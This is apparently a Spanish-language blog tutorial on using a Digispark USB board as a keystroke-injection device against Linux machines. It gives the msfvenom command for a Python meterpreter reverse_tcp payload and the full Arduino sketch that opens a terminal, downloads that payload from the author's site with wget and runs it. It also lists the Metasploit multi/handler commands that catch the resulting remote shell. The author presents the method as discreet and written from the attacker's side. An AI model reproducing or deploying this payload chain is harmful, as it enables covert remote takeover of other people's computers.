Bueno últimamente he estado mostrando algunos adelantos sobre digispark en mi cuenta de instagram pero hoy vamos a ver como explotarlo para un sistema de linux.

Como funciona? Obviamente el digispark funciona siendo todo un teclado entonces he estado mirando todos los exploit que Kali Linux puede crear para LINUX y me ha gustado uno que es muy fácil y discreto, pero obviamente vamos a tener requisitos.

REQUISITOS:

  • Tener KALI LINUX
  • Digispark
  • Un servidor o un lugar para guardar y poder modificar el exploit desde allí, ojo que también puedas descargarlo usando wget. En mi caso tengo mi web.
  • Arduino IDE
  • Haber leído mis dos post anteriores HERE and HERE

PROCESO:

El código se podrá ejecutar fuera y dentro de la red en caso  de siempre tener corriendo metasploit.

Primeramente vamos a crear el exploit escrito en Python.

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=6666 R>creadpag.py

Con este comando estamos generando un exploit en el cual lo vamos a escribir en tu servidor con .txt

cat cread.py

Ese código lo vamos a subir al servidor en mi caso sera mi pagina web y no quería subirlo como .txt por si alguien estaba jugando en mi web y encuentre ese archivo.
En caso lo podes probar en varios lugares tenes que configurar tu maquina en IP stactic con la misma IP que usaste en caso que el router genere otras IP ejemplo:
192.168.1.6 es tu IP
192.168.10.6 es la IP
Que puede generar el router, entonces podes cambiar el .txt para no tener problemas o en caso de también hacerlo fuera de la red teniendo en cuenta de abrir el puerto 6666, obviamente esto lo hacemos por ser atacante y no ser victima.
Lo que estamos haciendo es no modificar el código ni volver a tocar el código que subamos con arduino IDE al digispark.

CODE

#include "DigiKeyboard.h"
void setup()
{
  
  DigiKeyboard.delay(1000);
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_T, MOD_CONTROL_LEFT | MOD_ALT_LEFT);
  DigiKeyboard.delay(2000);
  DigiKeyboard.println("cd Desktop");
  DigiKeyboard.delay(2000);
  DigiKeyboard.println("wget https://creadpag.com/pythonpayload.txt");
  DigiKeyboard.delay(4000);
  DigiKeyboard.println("mv pythonpayload.txt pythonpayload.py");
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("leafpad pythonpayload.py");
  DigiKeyboard.delay(2000);
  DigiKeyboard.sendKeyStroke(KEY_A, MOD_CONTROL_LEFT);
  DigiKeyboard.delay(3000);
  DigiKeyboard.sendKeyStroke(KEY_C, MOD_CONTROL_LEFT);

  DigiKeyboard.delay(3000);
  DigiKeyboard.sendKeyStroke(KEY_Q, MOD_CONTROL_LEFT); 
  
  DigiKeyboard.delay(4000);
  DigiKeyboard.println("python "); 
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_V, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT);  
  DigiKeyboard.delay(9000);
  DigiKeyboard.println("quit()");
  DigiKeyboard.delay(10000);
  DigiKeyboard.println("exit");

}
void loop()
{
 
}

Que escrito? Bueno estamos ordenando al código que habrá tu terminal y que por favor descargue el código y correrlo en python mientras que metasploit lo captura se cierre y fin.

Antes de nada intenta corregir los delay en caso de hacerlo el proceso rápido luego tener subido el código en el digispark vamos primero a correr metasploit.

service postgresql start
msfconsole -q
use multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.1.7
set LPORT 6666
exploit



No te olvides en compartirlo para seguir publicando usando windows o mac. GRACIAS

Share Please!